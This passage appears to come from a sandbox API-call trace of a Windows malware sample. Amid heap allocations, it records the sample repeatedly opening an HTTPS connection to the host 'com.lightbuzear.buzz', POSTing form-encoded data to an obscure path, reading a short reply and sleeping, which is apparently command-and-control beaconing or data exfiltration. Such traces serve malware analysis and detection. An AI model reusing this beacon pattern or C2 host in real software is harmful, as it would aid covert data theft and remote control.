returned 0x47ce730 [0249.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0249.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0249.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0249.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815968 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800be0 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0249.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800be0 | out: hHeap=0x4780000) returned 1 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f00 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0249.223] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f50 [0249.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0249.224] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0249.224] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0249.224] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f50 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0249.225] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f50 [0249.225] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0249.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0249.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f50 | out: hHeap=0x4780000) returned 1 [0249.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f50 [0249.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0249.226] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a78 [0249.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0249.226] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0249.226] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0249.227] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0250.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800a78 | out: hHeap=0x4780000) returned 1 [0250.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0250.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0250.260] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0250.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0250.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0250.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0250.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800bb8 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0250.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e10 [0250.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0250.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0250.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0250.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0250.271] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0250.271] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0250.272] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0250.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0250.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815968 [0250.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0250.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800bb8 [0250.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0250.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800a78 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0250.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0250.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0250.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0250.274] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0250.274] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0250.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0250.274] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0250.275] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0250.275] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0250.275] FreeLibrary (hLibModule=0x71570000) returned 1 [0250.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0250.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0250.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0250.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800e38 | out: hHeap=0x4780000) returned 1 [0250.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0250.278] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0250.278] Sleep (dwMilliseconds=0x2710) [0250.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0250.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0250.292] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0250.292] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0250.292] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0250.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0250.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0250.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0250.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0250.293] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815860 [0250.293] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0250.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800bb8 | out: hHeap=0x4780000) returned 1 [0250.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0250.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800bb8 [0250.294] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0250.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0250.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0250.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0250.294] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0250.294] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815938 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815938 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800c30 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0250.295] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800e38 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0250.295] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0250.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0250.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0250.296] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0250.296] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0250.296] FreeLibrary (hLibModule=0x71780000) returned 1 [0250.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0250.297] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0250.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0250.297] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815968 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159c8 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815968 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0250.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815968 [0250.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0250.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0250.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0250.299] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0250.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0250.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0250.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48159c8 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815a28 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159c8 | out: hHeap=0x4780000) returned 1 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a28 | out: hHeap=0x4780000) returned 1 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815a28 [0250.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0250.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0250.300] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b30 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b30 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800ed8 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0250.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0250.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800ed8 | out: hHeap=0x4780000) returned 1 [0250.302] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800ed8 [0250.302] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0250.302] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800fc8 [0250.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0250.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0250.302] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0250.303] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800fc8 | out: hHeap=0x4780000) returned 1 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0250.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0250.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 